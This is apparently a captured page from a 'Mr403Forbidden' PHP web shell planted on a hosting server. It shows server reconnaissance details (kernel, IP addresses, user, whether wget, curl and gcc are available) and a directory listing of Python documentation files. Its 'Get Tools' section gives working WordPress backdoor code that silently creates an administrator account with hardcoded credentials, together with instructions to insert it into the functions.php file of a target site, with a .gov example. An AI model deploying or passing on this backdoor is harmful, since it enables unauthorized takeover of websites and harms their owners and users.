./Mr403Forbidden

:/usr/share/doc/python2-docs/html/_sources/tutorial/ [ s--------- ]

System: Linux myhosting.zubahost.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
Software: LiteSpeed
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 194.163.174.55
Your IP: 216.73.216.138
User: business1 (1088) | Group: business1 (1091)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
mail

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
appendix.rst.txt file 2019-03-02 18:17 4.5 KB root/root s---------
appetite.rst.txt file 2019-03-02 18:17 4.4 KB root/root s---------
classes.rst.txt file 2019-03-02 18:17 36.27 KB root/root s---------
controlflow.rst.txt file 2019-03-02 18:17 23.25 KB root/root s---------
datastructures.rst.txt file 2019-03-02 18:17 24.96 KB root/root s---------
errors.rst.txt file 2019-03-02 18:17 14.93 KB root/root s---------
floatingpoint.rst.txt file 2019-03-02 18:17 8.28 KB root/root s---------
index.rst.txt file 2019-03-02 18:17 2.32 KB root/root s---------
inputoutput.rst.txt file 2019-03-02 18:17 15.68 KB root/root s---------
interactive.rst.txt file 2019-03-02 18:17 6.59 KB root/root s---------
interpreter.rst.txt file 2019-03-02 18:17 5.64 KB root/root s---------
introduction.rst.txt file 2019-03-02 18:17 21.33 KB root/root s---------
modules.rst.txt file 2019-03-02 18:17 24.08 KB root/root s---------
stdlib.rst.txt file 2019-03-02 18:17 9.63 KB root/root s---------
stdlib2.rst.txt file 2019-03-02 18:17 14.88 KB root/root s---------
whatnow.rst.txt file 2019-03-02 18:17 3.02 KB root/root s---------

© ./Mr403Forbidden